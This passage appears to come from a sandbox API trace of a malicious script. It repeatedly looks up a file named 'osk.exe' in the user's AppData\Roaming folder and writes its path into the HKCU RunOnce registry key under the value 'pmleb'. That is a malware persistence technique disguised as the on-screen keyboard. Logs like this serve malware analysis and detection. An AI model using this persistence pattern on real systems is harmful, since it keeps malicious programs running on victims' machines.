out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.129] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.129] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.129] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0079.129] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.129] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x28 [0079.129] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.130] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x27 [0079.130] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.130] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.130] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.130] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.130] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.130] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.130] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.131] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.131] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.131] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0079.131] RegCloseKey (hKey=0x280) returned 0x0 [0079.131] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.131] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.131] SetTimer (hWnd=0x20280, nIDEvent=0x2027, uElapse=0xa, lpTimerFunc=0x0) returned 0x2027 [0079.131] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.144] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.144] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.144] KillTimer (hWnd=0x20280, uIDEvent=0x2027) returned 1 [0079.145] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.145] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.145] IUnknown:Release (This=0x787518) returned 0x1 [0079.145] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.145] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.145] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.145] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.145] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 
[0079.146] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.146] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x29 [0079.146] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.146] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x28 [0079.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.147] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.147] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.147] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.147] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.147] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.147] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.147] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.147] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.147] RegCloseKey (hKey=0x280) returned 0x0 [0079.147] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.148] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.148] SetTimer (hWnd=0x20280, nIDEvent=0x2028, uElapse=0xa, lpTimerFunc=0x0) returned 0x2028 [0079.148] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.160] KillTimer (hWnd=0x20280, uIDEvent=0x2028) returned 1 [0079.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.160] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.160] IUnknown:Release (This=0x787518) returned 0x1 [0079.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.161] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, 
varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.161] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.161] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.161] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0079.161] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, 
[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.161] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2a [0079.161] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.162] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x29 [0079.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.162] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.162] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.162] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.162] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.162] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.163] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.163] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.163] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.163] RegCloseKey (hKey=0x280) returned 0x0 [0079.163] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.163] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.163] SetTimer (hWnd=0x20280, nIDEvent=0x2029, uElapse=0xa, lpTimerFunc=0x0) returned 0x2029 [0079.163] 
GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.176] KillTimer (hWnd=0x20280, uIDEvent=0x2029) returned 1 [0079.176] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.176] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.176] IUnknown:Release (This=0x787518) returned 0x1 [0079.176] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.176] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.176] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, 